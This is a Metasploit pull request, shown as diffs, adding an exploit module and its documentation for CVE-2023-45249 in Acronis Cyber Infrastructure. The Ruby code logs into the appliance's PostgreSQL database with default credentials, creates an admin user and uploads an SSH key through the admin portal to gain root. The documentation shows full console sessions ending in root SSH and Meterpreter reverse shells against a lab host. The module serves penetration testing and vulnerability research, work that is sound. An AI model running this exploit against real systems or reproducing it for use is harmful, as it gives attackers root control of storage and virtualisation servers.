### PR TITLE
Acronis Cyber Infrastructure Default Password RCE [CVE-2023-45249]

### DIFF
--- a/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
+++ b/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
@@ -57,7 +57,7 @@ This option is required and is the SSH port (default: 22) to establish a SSH ses
 This option is optional and allows the use of your own SSH private key file in PEM format.
 Generate your SSH private key with following command `ssh-keygen -t rsa -b 2048 -m PEM -f <your_priv_key>` or
 convert your existing SSH private key to PEM format with `ssh-keygen -p -N "" -m PEM -f /path/to/existing/private/key`
-If no key is provided, a private SSH key will be generated.
+If no key is provided, a SSH private key will be generated for you.
 
 ## Scenarios
 ```msf
@@ -242,4 +242,5 @@ ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCauf4JO4xGHWulsoHHOwTXztTvJ4FQz92RTicFIqqH
 ```
 
 ## Limitations
-No limitations.
+When using your own SSH private key, be aware of the fact that you can not upload the same SSH public key twice via Acronis Web Portal.
+Duplicate SSH public keys are not allowed and the exploit will fail if this occurs.

--- a/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
+++ b/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
@@ -53,8 +53,13 @@ This option is required and is PostgreSQL database port (default: 5432) to conne
 ### SSHPORT
 This option is required and is the SSH port (default: 22) to establish a SSH session.
 
-### STORE_CRED
-This option is optional (default: true) and stores the new created admin credentials in the msf database.
+### PRIV_KEY
+This option is optional and allows the use of your own SSH private key.
+If no key is provided, a private SSH key will be generated.
+
+### PUB_KEY
+This option is optional and allows the use of your own SSH public key.
+If no key is provided, a public SSH key will be generated.
 
 ## Scenarios
 ```msf
@@ -96,15 +101,16 @@ Basic options:
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   DATABASE    keystone         yes       The database to authenticate against
-  DBPORT      5432             yes       PostgreSQL DB port
+  DBPORT      6432             yes       PostgreSQL DB port
   PASSWORD    vstoradmin       no        The password for the specified username. Leave blank for a random password.
+  PRIV_KEY                     no        SSH Private Key
+  PUB_KEY                      no        SSH Public Key
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
                                          cs/using-metasploit.html
   RPORT       8888             yes       The target port (TCP)
   SSHPORT     22               yes       SSH port
   SSL         true             no        Negotiate SSL/TLS for outgoing connections
-  STORE_CRED  true             no        Store user admin credentials into the database.
   TARGETURI   /                yes       Path to the Acronis Cyber Infra application
   USERNAME    vstoradmin       yes       The username to authenticate as
   VHOST                        no        HTTP server virtual host

--- a/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
+++ b/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
@@ -137,12 +137,12 @@ View the full module info with the info -d command
 msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set rhosts 192.168.201.5
 rhosts => 192.168.201.5
 msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > check
-[*] 192.168.201.5:8888 - The target appears to be vulnerable. Version 4.7.1.pre.53
+[*] 192.168.201.5:8888 - The target appears to be vulnerable. Version 4.7.1-53
 msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit
 
 [*] Started reverse TCP handler on 192.168.201.8:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Version 4.7.1.pre.53
+[+] The target appears to be vulnerable. Version 4.7.1-53
 [*] Creating admin user qagkx with password gXv0E2DUU9 for access at the Acronis Admin Portal.
 [*] Saving admin credentials at the msf database.
 [*] Creating SSH private and public key.
@@ -168,7 +168,7 @@ target => 1
 msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit
 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Version 4.7.1.pre.53
+[+] The target appears to be vulnerable. Version 4.7.1-53
 [*] Creating admin user exvk1 with password NcwVNFNL3t for access at the Acronis Admin Portal.
 [*] Saving admin credentials at the msf database.
 [*] Creating SSH private and public key.

--- a/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
+++ b/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
@@ -118,7 +118,7 @@ Description:
   cloud-native applications in production environments.
   This module exploits a default password vulnerability in ACI which allow an attacker to access
   the ACI PostgreSQL database and gain administrative access to the ACI Web Portal.
-  This opens the door for the attacker to upload ssh keys that enables root acces
+  This opens the door for the attacker to upload SSH keys that enables root access
   to the appliance/server. This attack can be remotely executed over the WAN as long as the
   PostgreSQL and SSH services are exposed to the outside world.
   ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69,

--- a/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
+++ b/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
@@ -53,13 +53,11 @@ This option is required and is PostgreSQL database port (default: 5432) to conne
 ### SSHPORT
 This option is required and is the SSH port (default: 22) to establish a SSH session.
 
-### PRIV_KEY
-This option is optional and allows the use of your own SSH private key.
+### PRIV_KEY_FILE
+This option is optional and allows the use of your own SSH private key file in PEM format.
+Generate your SSH private key with following command `ssh-keygen -t rsa -b 2048 -m PEM -f <your_priv_key>` or
+convert your existing SSH private key to PEM format with `ssh-keygen -p -N "" -m PEM -f /path/to/existing/private/key`
 If no key is provided, a private SSH key will be generated.
-
-### PUB_KEY
-This option is optional and allows the use of your own SSH public key.
-If no key is provided, a public SSH key will be generated.
 
 ## Scenarios
 ```msf
@@ -98,22 +96,21 @@ Check supported:
   Yes
 
 Basic options:
-  Name        Current Setting  Required  Description
-  ----        ---------------  --------  -----------
-  DATABASE    keystone         yes       The database to authenticate against
-  DBPORT      6432             yes       PostgreSQL DB port
-  PASSWORD    vstoradmin       no        The password for the specified username. Leave blank for a random password.
-  PRIV_KEY                     no        SSH Private Key
-  PUB_KEY                      no        SSH Public Key
-  Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
-  RHOSTS                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
-                                         cs/using-metasploit.html
-  RPORT       8888             yes       The target port (TCP)
-  SSHPORT     22               yes       SSH port
-  SSL         true             no        Negotiate SSL/TLS for outgoing connections
-  TARGETURI   /                yes       Path to the Acronis Cyber Infra application
-  USERNAME    vstoradmin       yes       The username to authenticate as
-  VHOST                        no        HTTP server virtual host
+  Name           Current Setting  Required  Description
+  ----           ---------------  --------  -----------
+  DATABASE       keystone         yes       The database to authenticate against
+  DBPORT         6432             yes       PostgreSQL DB port
+  PASSWORD       vstoradmin       no        The password for the specified username. Leave blank for a random password.
+  PRIV_KEY_FILE                   no        SSH private key file in PEM format (ssh-keygen -t rsa -b 2048 -m PEM -f <priv_key_file>)
+  Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-me
+                                            tasploit.html
+  RPORT          8888             yes       The target port (TCP)
+  SSHPORT        22               yes       SSH port
+  SSL            true             no        Negotiate SSL/TLS for outgoing connections
+  TARGETURI      /                yes       Path to the Acronis Cyber Infra application
+  USERNAME       vstoradmin       yes       The username to authenticate as
+  VHOST                           no        HTTP server virtual host
 
 Payload information:
 
@@ -135,7 +132,7 @@ References:
   https://security-advisory.acronis.com/advisories/SEC-6452
   https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249
 
-View the full module info with the info -d command
+View the full module info with the info -d command.
 ```
 ## Scenarios
 ### Acronis Cyber Infrastructure 4.7 appliance Unix/Linux command
@@ -189,6 +186,59 @@ id
 uid=0(root) gid=0(root) groups=0(root)
 uname -a
 Linux aci-471-53.vstoragedomain 3.10.0-1160.41.1.vz7.183.5 #1 SMP Thu Sep 23 18:26:47 MSK 2021 x86_64 x86_64 x86_64 GNU/Linux
+```
+### Acronis Cyber Infrastructure 4.7 appliance Interactive SSH using your own SSH private key file in PEM format
+```msf
+msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > ssh-keygen -t rsa -b 2048 -m PEM -f /tmp/aci_rsa
+[*] exec: ssh-keygen -t rsa -b 2048 -m PEM -f /tmp/aci_rsa
+
+Generating public/private rsa key pair.
+Enter passphrase (empty for no passphrase):
+Enter same passphrase again:
+Your identification has been saved in /tmp/aci_rsa
+Your public key has been saved in /tmp/aci_rsa.pub
+The key fingerprint is:
+SHA256:H1Ewu7NLZdYIV4SQZPhsaGkXb/IG9fQgZEjqfKBRTIg root@cerberus
+The key's randomart image is:
++---[RSA 2048]----+
+|     . +o+B*+oo  |
+|    E ..oo+=+.o  |
+|      . o=++.+ o |
+|       ==.B=oo. .|
+|      .oSo=== .  |
+|         o Bo    |
+|          +.     |
+|         . .     |
+|          .      |
++----[SHA256]-----+
+msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set target 1
+target => 1
+msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set PRIV_KEY_FILE /tmp/aci_rsa
+PRIV_KEY_FILE => /tmp/aci_rsa
+msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set rhosts 192.168.201.5
+rhosts => 192.168.201.5
+msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 4.7.1-53
+[*] Creating admin user gzarzyh with password XiloxPsdto for access at the Acronis Admin Portal.
+[*] Saving admin credentials at the msf database.
+[*] Using your own SSH private key file: /tmp/aci_rsa in PEM format.
+[*] Saving SSH public and private key pair at the msf database.
+[*] Uploading SSH public key at the Acronis Admin Portal.
+[*] Authenticating with SSH private key.
+[*] Executing Interactive SSH for generic/ssh/interact
+[*] SSH session 1 opened (192.168.201.8:40083 -> 192.168.201.5:22) at 2024-09-20 09:40:22 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux aci-471-53.vstoragedomain 3.10.0-1160.41.1.vz7.183.5 #1 SMP Thu Sep 23 18:26:47 MSK 2021 x86_64 x86_64 x86_64 GNU/Linux
+ls -l .ssh
+total 4
+-rw------- 1 root root 872 Sep 20 11:40 authorized_keys
+cat .ssh/authorized_keys
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCauf4JO4xGHWulsoHHOwTXztTvJ4FQz92RTicFIqqHOPvR3vsXkWYJP4vE109/ZnUh64jsMqMb+x66q3+D86rts/ST4smpMjQpL2uwfrn3KHKwVmH7vMYb07q4F8M2nw4TgzYcsXONqAyxmbW0ZJ3P3CdlXXiXMvyUmy55OyVgaBnjoiE1GJxXnssCqPMkf0MaZfZqaaBk3onaKnJ4pRROHe1LEaagSM7dOHjS1F6ViVUYtcfFLQfXj4Q7WsWS5uSUy6HkxDn5PNvzUli7SDJ5aPTDqmmeDjzoVlUl7ZP4CYZlrTpZ1v0C0IuI3qlZmuHPuGaCDN7ymPsRUV71aqv3 root VSTOR-KEY-ID:1966f610-e22a-4147-bec3-4cfb945bdee7
 ```
 
 ## Limitations

--- a/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
+++ b/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
@@ -149,6 +149,8 @@ msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit
 [*] Creating admin user qagkx with password gXv0E2DUU9 for access at the Acronis Admin Portal.
 [*] Saving admin credentials at the msf database.
 [*] Creating SSH private and public key.
+[*] Saving SSH public and private key pair at the msf database.
+[*] Getting the cluster information to upload the SSH public key at the Acronis Admin Portal.
 [*] Uploading SSH public key at the Acronis Admin Portal.
 [*] Authenticating with SSH private key.
 [*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
@@ -175,6 +177,8 @@ msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit
 [*] Creating admin user exvk1 with password NcwVNFNL3t for access at the Acronis Admin Portal.
 [*] Saving admin credentials at the msf database.
 [*] Creating SSH private and public key.
+[*] Saving SSH public and private key pair at the msf database.
+[*] Getting the cluster information to upload the SSH public key at the Acronis Admin Portal.
 [*] Uploading SSH public key at the Acronis Admin Portal.
 [*] Authenticating with SSH private key.
 [*] Executing Interactive SSH for generic/ssh/interact

--- a/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
+++ b/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
@@ -1,0 +1,189 @@
+## Vulnerable Application
+Acronis Cyber Infrastructure (ACI) is an IT infrastructure solution that provides storage, compute, and network resources.
+Businesses and Service Providers are using it for data storage, backup storage, creating and managing virtual machines and
+software-defined networks,running cloud-native applications in production environments.
+This module exploits a default password vulnerability in ACI which allow an attacker to access the ACI PostgreSQL database
+and gain administrative access to the ACI Web Portal.
+This opens the door for the attacker to upload ssh keys that enables root access to the appliance/server.
+
+This attack can be remotely executed over the WAN as long as the PostgreSQL and SSH services are exposed to the outside world.
+ACI versions `5.0` before build `5.0.1-61`, `5.1` before build `5.1.1-71`, `5.2` before build `5.2.1-69`, `5.3` before build `5.3.1-53`,
+and `5.4` before build `5.4.4-132` are vulnerable.
+
+The following release was tested.
+
+**Acronis Cyber Infrastructure ISO appliances:**
+* Acronis Cyber Infrastructure 4.7
+
+## Installation steps to install the Acronis Cyber Infrastructure (ACI) appliance
+* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
+* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
+* Download [ACI iso image](https://care.acronis.com/s/article/63431-Acronis-Cyber-Infrastructure-how-to-download-ISO?language=en_US).
+* Install the iso image in your virtualization engine.
+* When installed, configure the VM appliance to your needs using the menu options.
+* Boot up the VM and should be able to access the Acronis Cyber Infrastructure (ACI) appliance either thru the console, `ssh` on port `22`
+* or via the `webui` via `http://your_aci_ip:8888`.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `exploit/linux/http/acronis_cyber_infra_cve_2023_45249`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ]  `set lhost <attacker-ip>`
+- [ ] `set target <0=Unix/Linux Command, 1=Interactive SSH>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+
+### USERNAME
+This option is required and is the username (default: vstoradmin) to authenticate with the PostgreSQL database.
+
+### PASSWORD
+This option is required and is the password (default: vstoradmin) in plain text to authenticate with the PostgreSQL database.
+
+### DATABASE
+This option is required and is the database (default: keystone) which holds the ACI user and password configurations.
+
+### DBPORT
+This option is required and is PostgreSQL database port (default: 5432) to connect to the database.
+
+### SSHPORT
+This option is required and is the SSH port (default: 22) to establish a SSH session.
+
+### STORE_CRED
+This option is optional (default: true) and stores the new created admin credentials in the msf database.
+
+## Scenarios
+```msf
+msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > info
+
+       Name: Acronis Cyber Infrastructure default password remote code execution
+     Module: exploit/linux/http/acronis_cyber_infra_cve_2023_45249
+   Platform: Unix, Linux
+       Arch: cmd
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-07-24
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Acronis International GmbH
+
+Module side effects:
+ artifacts-on-disk
+ ioc-in-logs
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   Unix/Linux Command
+      1   Interactive SSH
+
+Check supported:
+  Yes
+
+Basic options:
+  Name        Current Setting  Required  Description
+  ----        ---------------  --------  -----------
+  DATABASE    keystone         yes       The database to authenticate against
+  DBPORT      5432             yes       PostgreSQL DB port
+  PASSWORD    vstoradmin       no        The password for the specified username. Leave blank for a random password.
+  Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
+                                         cs/using-metasploit.html
+  RPORT       8888             yes       The target port (TCP)
+  SSHPORT     22               yes       SSH port
+  SSL         true             no        Negotiate SSL/TLS for outgoing connections
+  STORE_CRED  true             no        Store user admin credentials into the database.
+  TARGETURI   /                yes       Path to the Acronis Cyber Infra application
+  USERNAME    vstoradmin       yes       The username to authenticate as
+  VHOST                        no        HTTP server virtual host
+
+Payload information:
+
+Description:
+  Acronis Cyber Infrastructure (ACI) is an IT infrastructure solution that provides storage,
+  compute, and network resources. Businesses and Service Providers are using it for data storage,
+  backup storage, creating and managing virtual machines and software-defined networks, running
+  cloud-native applications in production environments.
+  This module exploits a default password vulnerability in ACI which allow an attacker to access
+  the ACI PostgreSQL database and gain administrative access to the ACI Web Portal.
+  This opens the door for the attacker to upload ssh keys that enables root acces
+  to the appliance/server. This attack can be remotely executed over the WAN as long as the
+  PostgreSQL and SSH services are exposed to the outside world.
+  ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69,
+  5.3 before build 5.3.1-53, and 5.4 before build 5.4.4-132 are vulnerable.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2023-45249
+  https://security-advisory.acronis.com/advisories/SEC-6452
+  https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249
+
+View the full module info with the info -d command
+```
+## Scenarios
+### Acronis Cyber Infrastructure 4.7 appliance Unix/Linux command
+```msf
+msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set rhosts 192.168.201.5
+rhosts => 192.168.201.5
+msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > check
+[*] 192.168.201.5:8888 - The target appears to be vulnerable. Version 4.7.1.pre.53
+msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 4.7.1.pre.53
+[*] Creating admin user qagkx with password gXv0E2DUU9 for access at the Acronis Admin Portal.
+[*] Saving admin credentials at the msf database.
+[*] Creating SSH private and public key.
+[*] Uploading SSH public key at the Acronis Admin Portal.
+[*] Authenticating with SSH private key.
+[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (3045380 bytes) to 192.168.201.5
+[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.5:51488) at 2024-09-15 19:45:46 +0000
+
+meterpreter > sysinfo
+Computer     : aci-471-53.vstoragedomain
+OS           : Red Hat 4.7 (Linux 3.10.0-1160.41.1.vz7.183.5)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+```
+### Acronis Cyber Infrastructure 4.7 appliance Interactive SSH
+```msf
+msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set target 1
+target => 1
+msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 4.7.1.pre.53
+[*] Creating admin user exvk1 with password NcwVNFNL3t for access at the Acronis Admin Portal.
+[*] Saving admin credentials at the msf database.
+[*] Creating SSH private and public key.
+[*] Uploading SSH public key at the Acronis Admin Portal.
+[*] Authenticating with SSH private key.
+[*] Executing Interactive SSH for generic/ssh/interact
+[*] SSH session 1 opened (192.168.201.8:36279 -> 192.168.201.5:22) at 2024-09-16 17:56:56 +0000
+
+pwd
+/root
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux aci-471-53.vstoragedomain 3.10.0-1160.41.1.vz7.183.5 #1 SMP Thu Sep 23 18:26:47 MSK 2021 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+## Limitations
+No limitations.

--- a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
+++ b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
@@ -95,8 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('TARGETURI', [true, 'Path to the Acronis Cyber Infra application', '/']),
       OptPort.new('DBPORT', [true, 'PostgreSQL DB port', 6432]),
       OptPort.new('SSHPORT', [true, 'SSH port', 22]),
-      OptString.new('PUB_KEY', [false, 'SSH Public Key', '']),
-      OptString.new('PRIV_KEY', [false, 'SSH Private Key', ''])
+      OptString.new('PRIV_KEY_FILE', [false, 'SSH private key file in PEM format (ssh-keygen -t rsa -b 2048 -m PEM -f <priv_key_file>)', ''])
     ])
     register_advanced_options([
       OptInt.new('ConnectTimeout', [ true, 'Maximum number of seconds to establish a TCP connection', 10])
@@ -289,36 +288,35 @@ class MetasploitModule < Msf::Exploit::Remote
     # log out from the postsgreSQL DB
     postgres_logout if postgres_conn
 
-    # create or use user provided SSH key pair
-    if datastore['PUB_KEY'].blank? || datastore['PRIV_KEY'].blank?
+    # create or use own SSH private key
+    if datastore['PRIV_KEY_FILE'].blank?
       print_status('Creating SSH private and public key.')
-      k = SSHKey.generate
-      priv_key = k.private_key
-      pub_key = "#{k.ssh_public_key} root"
+      k = SSHKey.generate(comment: 'root')
     else
-      print_status('Using user provided SSH private and public key.')
-      priv_key = datastore['PRIV_KEY']
-      pub_key = "#{datastore['PUB_KEY']} root"
+      print_status("Using your own SSH private key file: #{datastore['PRIV_KEY_FILE']} in PEM format.")
+      fail_with(Failure::NotFound, "Can not find or open SSH private key file: #{datastore['PRIV_KEY_FILE']}") unless File.file?(File.expand_path(datastore['PRIV_KEY_FILE']))
+      f = File.read(File.expand_path(datastore['PRIV_KEY_FILE']))
+      k = SSHKey.new(f, comment: 'root')
     end
-    vprint_status(priv_key)
-    vprint_status(pub_key)
+    vprint_status(k.private_key)
+    vprint_status(k.ssh_public_key)
 
     # storing SSH public and private key at the msf database
     print_status('Saving SSH public and private key pair at the msf database.')
-    store_valid_credential(user: 'ACI SSH public key', private: pub_key)
-    store_valid_credential(user: 'ACI SSH private key', private: priv_key)
+    store_valid_credential(user: 'ACI SSH public key', private: k.ssh_public_key)
+    store_valid_credential(user: 'ACI SSH private key', private: k.private_key)
 
     # log in with the new admin user credentials at the Acronis Admin Portal
     fail_with(Failure::NoAccess, "Failed to authenticate at the Acronis Admin Portal with #{username} and #{password}") unless aci_login(username, password)
 
     # upload the public ssh key at the Acronis Admin Portal to enable root access via SSH
     print_status('Uploading SSH public key at the Acronis Admin Portal.')
-    fail_with(Failure::NoAccess, 'Failed to upload SSH public key.') unless upload_sshkey(pub_key)
+    fail_with(Failure::NoAccess, 'Failed to upload SSH public key.') unless upload_sshkey(k.ssh_public_key)
 
     # login with SSH private key to establish SSH root session
     ssh_opts = ssh_client_defaults.merge({
       auth_methods: ['publickey'],
-      key_data: [ priv_key ],
+      key_data: [ k.private_key ],
       port: datastore['SSHPORT']
     })
     ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

--- a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
+++ b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
@@ -169,7 +169,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return true
   end
 
-  # Login at the Acronis Cyber Infrastructure web portal
+  # login at the Acronis Cyber Infrastructure web portal
   def aci_login(name, pwd)
     post_data = {
       username: name.to_s,
@@ -188,8 +188,32 @@ class MetasploitModule < Msf::Exploit::Remote
     return res&.code == 200
   end
 
-  # Upload the SSH public key at the Acronis Cyber Infrastructure web portal
-  def upload_sshkey(sshkey)
+  # returns cluster id or nil if not found
+  def get_cluster_id
+    res = send_request_cgi({
+      'method' => 'GET',
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'clusters')
+    })
+
+    return unless res&.code == 200
+    return unless res.body.include?('data') && res.body.include?('id')
+
+    # parse json response and get the version
+    res_json = res.get_json_document
+    return if res_json.blank?
+
+    res_json['data'].each do |cluster|
+      return cluster['id'] unless cluster['id'].nil?
+    end
+  end
+
+  # upload the SSH public key using the cluster_id defined at the Acronis Cyber Infrastructure web portal
+  def upload_sshkey(sshkey, cluster_id)
     post_data = {
       key: sshkey.to_s,
       event:
@@ -209,7 +233,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => {
         'X-Requested-With' => 'XMLHttpRequest'
       },
-      'uri' => normalize_uri(target_uri.path, 'api', 'v2', '1', 'ssh-keys'),
+      'uri' => normalize_uri(target_uri.path, 'api', 'v2', cluster_id.to_s, 'ssh-keys'),
       'data' => post_data.to_s
     })
     return true if res&.code == 202 && res.body.include?('task_id')
@@ -223,7 +247,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @timeout = true
   end
 
-  # Return ACI version-release string or nil if not found
+  # return ACI version-release string or nil if not found
   def get_aci_version
     res = send_request_cgi({
       'method' => 'GET',
@@ -309,9 +333,14 @@ class MetasploitModule < Msf::Exploit::Remote
     # log in with the new admin user credentials at the Acronis Admin Portal
     fail_with(Failure::NoAccess, "Failed to authenticate at the Acronis Admin Portal with #{username} and #{password}") unless aci_login(username, password)
 
+    # get cluster id to upload the SSH keys
+    print_status('Getting the cluster information to upload the SSH public key at the Acronis Admin Portal.')
+    cluster_id = get_cluster_id
+    fail_with(Failure::NotFound, 'Can not find a cluster and retrieve the id.') if cluster_id.nil?
+
     # upload the public ssh key at the Acronis Admin Portal to enable root access via SSH
     print_status('Uploading SSH public key at the Acronis Admin Portal.')
-    fail_with(Failure::NoAccess, 'Failed to upload SSH public key.') unless upload_sshkey(k.ssh_public_key)
+    fail_with(Failure::NoAccess, 'Failed to upload SSH public key.') unless upload_sshkey(k.ssh_public_key, cluster_id)
 
     # login with SSH private key to establish SSH root session
     ssh_opts = ssh_client_defaults.merge({

--- a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
+++ b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
@@ -1,0 +1,310 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'sshkey'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include BCrypt
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::Postgres
+  include Msf::Exploit::Remote::SSH
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  # ssh_socket
+  attr_accessor :ssh_socket
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Acronis Cyber Infrastructure default password remote code execution',
+        'Description' => %q{
+          Acronis Cyber Infrastructure (ACI) is an IT infrastructure solution that provides storage,
+          compute, and network resources. Businesses and Service Providers are using it for data storage,
+          backup storage, creating and managing virtual machines and software-defined networks,running
+          cloud-native applications in production environments.
+          This module exploits a default password vulnerability in ACI which allow an attacker to access
+          the ACI PostgreSQL database and gain administrative access to the ACI Admin Portal.
+          This opens the door for the attacker to upload ssh keys that enables addministrative root acces
+          to the appliance/server. This attack can be remotely executed over the WAN as long as the
+          PostgreSQL and SSH services are exposed to the outside world.
+          ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69,
+          5.3 before build 5.3.1-53, and 5.4 before build 5.4.4-132 are vulnerable.
+        },
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module
+          'Acronis International GmbH', # discovery
+        ],
+        'References' => [
+          ['CVE', '2023-45249'],
+          ['URL', 'https://security-advisory.acronis.com/advisories/SEC-6452'],
+          ['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Privileged' => true,
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix/Linux Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd
+            }
+          ],
+          [
+            'Interactive SSH',
+            {
+              'Type' => :ssh_interact,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'generic/ssh/interact'
+              },
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'ssh_interact'
+                }
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-07-24',
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 8888,
+          'USERNAME' => 'vstoradmin',
+          'PASSWORD' => 'vstoradmin',
+          'DATABASE' => 'keystone',
+          'SSH_TIMEOUT' => 30,
+          'WfsDelay' => 5
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+    deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to the Acronis Cyber Infra application', '/']),
+      OptBool.new('STORE_CRED', [false, 'Store user admin credentials into the database.', true]),
+      OptPort.new('DBPORT', [true, 'PostgreSQL DB port', 5432]),
+      OptPort.new('SSHPORT', [true, 'SSH port', 22])
+    ])
+    register_advanced_options([
+      OptInt.new('ConnectTimeout', [ true, 'Maximum number of seconds to establish a TCP connection', 10])
+    ])
+  end
+
+  def run_query(query)
+    @res_query = postgres_query(query)
+    case @res_query.keys[0]
+    when :conn_error
